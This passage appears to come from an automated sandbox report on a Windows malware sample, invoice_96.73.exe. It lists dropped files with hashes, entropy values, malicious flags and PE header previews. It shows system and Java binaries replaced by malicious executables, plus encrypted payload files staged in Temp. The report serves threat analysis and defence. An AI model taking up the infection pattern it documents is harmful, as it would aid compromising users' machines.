                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:DfV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:DtVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:018DBF2D48356A891846B379DA1FF300
                                                                                                                                                                SHA1:15DDCD526EDA778E43C2F80BE4C203C5F15269CA
                                                                                                                                                                SHA-256:6D9D5475B755390303D6C459FDB597E7096BD32BF2A6B5809DD011329F524310
                                                                                                                                                                SHA-512:2F4EA075829427B070EB1F338425215576421AA2F5CE2AFB952FA6EB4E663A652FAB53606252088982C5E60EC9A835D7A1E19FC26AA563AB495EE402DC8A369D
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P...............................................................#..P....P..H....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...H....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\ktab.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.000023603797839
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:uHV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ulVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:4D15FA041DA708FF517EC80F157A2E85
                                                                                                                                                                SHA1:09B20D5DAD77850D51F5C47538247FEE976D066B
                                                                                                                                                                SHA-256:A71208D2C63EC3C17A7CB3FECCE4A2343824B9BE5E20518E7CCCCCAD3153A9A7
                                                                                                                                                                SHA-512:60905DA27171110A4C804A24C37B17F6B55A10B9B806C2144083B71069F2FA1CF3193A01B7C89058964718F291FF8E1207D5E2752FA99ECF4D32BDADC23E2B3C
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P......m........................................................#..P....P..H....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...H....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\orbd.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.000773445203762
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:/rV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:/hVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:111E42C322F70E37F9648044645EAF90
                                                                                                                                                                SHA1:4CA22DEF9BC471B75B05866E2158E10623FD01AE
                                                                                                                                                                SHA-256:711EB94A7B229DF0334B39D52E19F171D2A6CC08EE735311FDF4A132C6C5F36E
                                                                                                                                                                SHA-512:4C6C74CAF007A4F7BBB0BC5B576FB6F3592081E2F0F13BE1BA36D484B3E30523082217C4F4216AEC39501BAF5A3684729FB5E8B60747D8E22E51E17EB9FEB156
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."................. ..........@.............................P......^.......................................................h$..P....P..H....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...H....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\pack200.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.0000329836634085
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:8vV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:8dVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:257E8C6C9044A556EDB9B92C12909FCD
                                                                                                                                                                SHA1:278C1DBF3B9551DD062045BC22A18BA2E36E062F
                                                                                                                                                                SHA-256:62039FA872517DEC519E4697F414A7159788D8E5C2D7A57B751B0468068ABEEB
                                                                                                                                                                SHA-512:37742278F9D28BA4F851EB1C31BE4B5FD45C911E62818EACC2B6399DE21F36C8911D2FE2AC532D068B61CAA589237A9E8BCCF1BA411C25AAD9B86D0EA0BEFF06
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P...............................................................#..P....P..T....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...T....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\policytool.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.00004724552698
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:IqV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ISVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:C9AAC268754DE57EA08798FAC2297BE7
                                                                                                                                                                SHA1:93A63446E46DF119B3618688BFB68E0F860044F1
                                                                                                                                                                SHA-256:1F7239D7A6EA18CEA4992AE251B4F9B43264488A8001EE7C5B9DBE86C5D62C58
                                                                                                                                                                SHA-512:27BD8A83E9C9B69D0736EEEF89C9D799307CD0791FA9C379781E3196BCF64EF960AA23DAB8E4EA154803B355AB1C1CEB83224B6A9AF36574A4F5C7E08D0259B4
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P......N........................................................$..P....P..h....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...h....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\rmid.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508352
                                                                                                                                                                Entropy (8bit):4.001092108156764
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:QHV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:QlVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:2D8C088D3673B20DDEBF39F47F622A22
                                                                                                                                                                SHA1:21C080104DBF3342FEAA145CCBA0C16AF4D3D098
                                                                                                                                                                SHA-256:B5F88E8384028981E23791325D9E56872714FC650A7CF6CDA9E4FE9ED6C7A34E
                                                                                                                                                                SHA-512:A1B5C919201521D13E17F0B1DAE075FC9748BE77B9D495BABC65BB27CA0E0F9D998FB2A9791A883CA6A7069179BF19D0CA87B6009371C14B4DD68EA61D1EA441
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P......6........................................................#..P....P..H....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...H....P......................@..@.reloc.......`.......$..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\rmiregistry.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.000009323291101
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:FgV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:FMVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:68F7F3C48FC17A20044C1A44635AA0B0
                                                                                                                                                                SHA1:9BF2B27BCD599DDD1B20F27A5353BE31D1054FB7
                                                                                                                                                                SHA-256:9EA19363B0196461F720A43E1DD9249B56F16DB354A845E8365E150AB4DE73D9
                                                                                                                                                                SHA-512:83D3BF8F9E05E9C6450D2D3567FF829873DB9C7CD714B04770118661708038329142998A33B5DAEDE655A5A2C11C2E50039479386E92D3D508259260B1965C3F
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P...............................................................#..P....P..h....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...h....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\servertool.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.00005638138536
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:KqV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:KSVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:9B6E680FCAF60ECB3EEBF0981627E5AB
                                                                                                                                                                SHA1:C121B9057BDB5DE2FB7EF07A3CC6A829E4E4EEC7
                                                                                                                                                                SHA-256:6FB9FCA9C0BB0765D2CC6A03795DE2CFF5E1DBB37D87AE72939A4515DC8C99BC
                                                                                                                                                                SHA-512:139996E1DDE923B27A84CAB09774D2298E5706442C33EE339785FCB65C41F1F514078AD26FA3DFEDE52D94883C9181084311CD0DEB1FC578F89E02921450E3D4
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P...............................................................$..P....P..h....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...h....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\ssvagent.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1562112
                                                                                                                                                                Entropy (8bit):4.097513477371846
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:0ZddtaNtuOOV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:IOuVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:5F6AF0D40D0AB7B0DCF88673911B2B7B
                                                                                                                                                                SHA1:004B12046056D8CDFBAD13B6B4CFD537777BF86A
                                                                                                                                                                SHA-256:5B8692741EB4F72092C7A155272C9426DBF0AC71CDCDD2D11DC94661454570F2
                                                                                                                                                                SHA-512:44831A90B922CFA76F814C50B553611732B5B5F41684854E953EC68399D4136D2B9D6D405B3700A668BED70D1C3CBEACAD74A11EC15212A321D53EF5702FC16F
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............N...N...N.>=N...N..9N...N.>?N...N.>.N...N.."N...N..2N...N...N...N...N...N.>.N...N.>;N...N.><N...NRich...N................PE..d....`OX.........."..........j......4..........@................................................................................................x...................................P.......................................................0........................text............................... ..`.rdata..*L.......N..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\tnameserv.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.000963489792153
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:pJV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:pzVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:986640509FB9F57FDEAD127043EED6A6
                                                                                                                                                                SHA1:76E197A6EEC089CED5A6EBCC4E84A295574ABF04
                                                                                                                                                                SHA-256:85F67E4C6E39DBA3D8193F30A933C8FEB82F03B75BEA3C7E884EF8905562398D
                                                                                                                                                                SHA-512:859601C4E836D9CF2ACB344E2F2A96963D7C39C33C0E20C940A6DF0B7EA94F972976C6D9A61B003A0D05D433665A70A2A54602C03A9DD7617DDE77F3880EB5B6
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."................. ..........@.............................P......S........................................................$..P....P..\....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...\....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\unpack200.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1688576
                                                                                                                                                                Entropy (8bit):4.318424550665476
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:TKQuT+wNTwGVg9N9JMlDlfjRiVuVsWt5MJMs:WfTJNTwCgFIDRRAubt5M
                                                                                                                                                                MD5:C79C5866767E12CFF86450CF47A1F8CB
                                                                                                                                                                SHA1:3F6A85774024474CC9DFE85E948A822EA4EEB1E5
                                                                                                                                                                SHA-256:685EE9B94B99B2E653891EBFEB8ED7A5735971491D1440D350B7DD523056A33F
                                                                                                                                                                SHA-512:D43C172BD65B8ED36313DA4B8BA50F70701C661C2E9BC42CD8A5472A2DDBA9923A028C145DD324FAAB7987490B2667D94BD32F1B7DC1C06A791255183C7B7ED5
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FZ...;l^.;l^.;l^.C.^.;l^.u.^.;l^...^.;l^.;m^K;l^...^.;l^...^.;l^...^.;l^...^.;l^...^.;l^Rich.;l^........PE..d....]OX.........."................. ..........@................................................................................................<...............L...................p...................................................h............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.idata..o...........................@....rsrc...............................@..@.reloc..............................@...................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Windows Media Player\wmpnetwk.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2106368
                                                                                                                                                                Entropy (8bit):6.889853511062774
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Cj9F3pnjgGHVVPZRR+riYiPe2QrUuxDnhHu8BsmVg9N9JMlDlfjRiVuVsWt5MJMs:uMgVRWpdnrUuxDhO8HgFIDRRAubt5M
                                                                                                                                                                MD5:10E89C8F206314FB02048F2CE4C83BFB
                                                                                                                                                                SHA1:C743E3E41D20A88C00D9B6819C55EC7C9B01AF55
                                                                                                                                                                SHA-256:F304247AF7F41AD898EC85E6EAF3483BABA1F6F3D05AA66B087AD0AA97EEA202
                                                                                                                                                                SHA-512:968FAFE48F87DF60466514AE9B22B55985D88D45D84384A99ACA060DC74E8E388BB530168609302DD9B681ABB0E05EF145A25CE01E20E01EFDC1D7DE27FCADDA
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..S%..S%..S%..t..F%..Z]..P%..Z]n.B%..Z]y.J%..S%..$..Z]i.F%..Z]`.'%..Z]~.R%..Z]{.R%..RichS%..........................PE..d......L.........."........................................................... ....... .............. ......................................8........P...*..........................0...........................................$....................................text...`........................... ..`.data...p~... ...4..................@....pdata...............:..............@..@.rsrc....*...P...,..................@..@.reloc... ..........................@...U..L.......L.......L.......L....7..L.......L.......L....0..L....,..L....Q..L....%..L.......L.......L.......L.......L....0..L............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.msvcrt.dll.USER32.dll.OLEAUT32.dll.ole32.dll.WSOCK32.dll.ws2_32.DLL.IPHLPAPI.DLL.SHLWAPI.dll.USERENV.dll.WTSAPI32.dl

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\autABDA.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):289280
                                                                                                                                                                Entropy (8bit):7.995248566590182
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:6144:+DIZrt61G9MxhbIFN8RdW8LfECCDUBgDLO4jwxfm9SEy87zXDqXFEmlKr5cn:+AZ61G9MbJRdPLMRUB864sxf+PyOXDqX
                                                                                                                                                                MD5:7EEDB9A99831CB037F35277E80A47D25
                                                                                                                                                                SHA1:909916D1A61B96E212968E3BD0B7C247FF9F47BD
                                                                                                                                                                SHA-256:EC19A24BAB6C6698F41F536D2C837983B5D7D957823CFA5BA1F291E6ACCE33F9
                                                                                                                                                                SHA-512:81601D69A103E3D1914BBB51A1F36F8A418CBE04D3AA92D11A06DB87BC60557D75B7011570CE5B47F2CAC9924502CB8AF48FE4AAA0DBE0802A2A2A2E946A33FA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:}..R0N28QTEH..1V.MRAQI4Q.V0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28.TEHZK.XP.[.p.5..wd<*!.>@W2&$%t7P8>"&a3,.#=8.=-rw.a.8;!-zY<\tMRAQI4Q1W9.~2T..X2.x(3.+...h!6.....4$.)..i4"..=R>m-5.QI4QHV0T..3N~9TT.>..1VPMRAQI.QJW;UHR3.68UTEHTT1V.YRAQY4QH&4TCRsN2(UTEJTT7VPMRAQI2QHV0TCR3>68UVEHTT1VRM..QI$QHF0TCR#N2(UTEHTT!VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1V~979%I4Q<.4TCB3N2`QTEXTT1VPMRAQI4QHV.TC23N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEH

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\trickstress

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):289280
                                                                                                                                                                Entropy (8bit):7.995248566590182
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:6144:+DIZrt61G9MxhbIFN8RdW8LfECCDUBgDLO4jwxfm9SEy87zXDqXFEmlKr5cn:+AZ61G9MbJRdPLMRUB864sxf+PyOXDqX
                                                                                                                                                                MD5:7EEDB9A99831CB037F35277E80A47D25
                                                                                                                                                                SHA1:909916D1A61B96E212968E3BD0B7C247FF9F47BD
                                                                                                                                                                SHA-256:EC19A24BAB6C6698F41F536D2C837983B5D7D957823CFA5BA1F291E6ACCE33F9
                                                                                                                                                                SHA-512:81601D69A103E3D1914BBB51A1F36F8A418CBE04D3AA92D11A06DB87BC60557D75B7011570CE5B47F2CAC9924502CB8AF48FE4AAA0DBE0802A2A2A2E946A33FA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:}..R0N28QTEH..1V.MRAQI4Q.V0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28.TEHZK.XP.[.p.5..wd<*!.>@W2&$%t7P8>"&a3,.#=8.=-rw.a.8;!-zY<\tMRAQI4Q1W9.~2T..X2.x(3.+...h!6.....4$.)..i4"..=R>m-5.QI4QHV0T..3N~9TT.>..1VPMRAQI.QJW;UHR3.68UTEHTT1V.YRAQY4QH&4TCRsN2(UTEJTT7VPMRAQI2QHV0TCR3>68UVEHTT1VRM..QI$QHF0TCR#N2(UTEHTT!VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1V~979%I4Q<.4TCB3N2`QTEXTT1VPMRAQI4QHV.TC23N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEHTT1VPMRAQI4QHV0TCR3N28UTEH

                                                                                                                                                                C:\Users\user\AppData\Roaming\23f9eaead4df6ab2.bin

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12320
                                                                                                                                                                Entropy (8bit):7.983858549622769
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:QRvIicY1qxZa66LuMc7MyNgpinNQHbnfQYeAc:x0AxZNtSwnIbnnBc
                                                                                                                                                                MD5:1F2CAA7BC8EE995DA3CC740C3F7D1D4A
                                                                                                                                                                SHA1:9936BE6E2826B231DE79739BEAAAFF11BA0ED172
                                                                                                                                                                SHA-256:B00A77B53D872B61285BFB2E6F690201D556A700E61D3DBA3D83F45F81713EF3
                                                                                                                                                                SHA-512:8A1C3F9B974060F66FAB25F9C7C4141C4580096000EA8F678CB44FAF1EF9A559F97FBED69A6C9762339D788C6B769E013E01CE7174ECDC568E927AC67D7D2785
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...b..2..?/T....dl.>2o.....x......\~-..|..2....#.....F%V).S..._..X<TZ@.... .1`...2b....^8.2.ZB.`....6...^#...3..r_f....Y.@.....rL..?b.R.j?.8..B...jH0M..+.q1u..U8']M.i..?...:.z.....N}...m..a.".."vR|2.6..:2.W.ukB.*...7...s.4x.k31.4{}.mU.E.Q..<..k5.6...pBZ..V!.(....C.&Pk.....f$..<.....PT.W.}.x.....g..LS.3.BUd.M=.[2..E.P.....pF`X....k.Hy..j...>.".+.V.[.g.x...(.L$..ll66[._..0v.".....HKzM*......3..>..<(6U}...I.s..'d.r.L......&...h$#._....L.F...Y.ow#...W.,M.{8ka.`%P.*3....3\5.'e...V.*.W..Y.b....2.."`.\Z......7.^.p.oJ.....nF?u.....X.i....._..w..6...2._.Q.g.iv...xS.m.j......=W..^...r_..+......}....d/.e..>..Q...}.o3.q...._. ..K{f..`hS..s.YW.h.]g..2U.61..w...M....^.q,].O..[.}.v.O;...8.>..}...S....."...c...dS.^..?.Q(....JZ%..Xx>..X,.......(..$.....:._...]b1......+s..W....;}.......2..GL.Q..c7q.|...vl...9..Q~.b..M...........hdT..x..9`X/.3..w....n..&.g)..wP|........g..$f2..?6....m..uU.}.P...a7.a.+...E....2....$.c....JG.>.y.f.T....?....9.%h.....

                                                                                                                                                                C:\Windows\DtcInstall.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                File Type:CSV text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):393
                                                                                                                                                                Entropy (8bit):5.0655840169633795
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:ptrsXwBRvFNUe+HWXkCpvSLrsXwD87oANUe+HWXkCpCrsXwPX7NfvWe+vj4Yk2v:jrsXwBRVmWnYrsXwDUmWn0rsXwP5/W8I
                                                                                                                                                                MD5:48CD226D18D44B6F3B78176045C0C4BF
                                                                                                                                                                SHA1:CFCE6F1019EC4918EEE8F362D7D840D4BF45EC19
                                                                                                                                                                SHA-256:6BC14FFF7FE81236A8FFF7E50B057BC71F348C43FF62431237675FE19A42D387
                                                                                                                                                                SHA-512:FD9AA1018B86D3953CCEFFEA9AF9DD8967912CE894B674D302648DB13D365E080B46C99DBCAB3901C0B2ED5349A4341C57A357E9EC384DF3C0CA0D08CBFAA8CE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:11-28-2024 06:12 : DTC Install error = 0, going to do CreateMutexW, d:\w7rtm\com\complus\dtc\shared\util\security.cpp (1101) ..11-28-2024 06:12 : DTC Install error = 0, successfully done CreateMutexW, d:\w7rtm\com\complus\dtc\shared\util\security.cpp (1141) ..11-28-2024 06:12 : DTC Install error = 0, IN CILogWriteAsynch::Init, d:\w7rtm\com\complus\dtc\dtc\log\logmgr\src\ilgwrta.cpp (173) ..

                                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1581056
                                                                                                                                                                Entropy (8bit):4.151371191753446
                                                                                                                                                                Encrypted:false
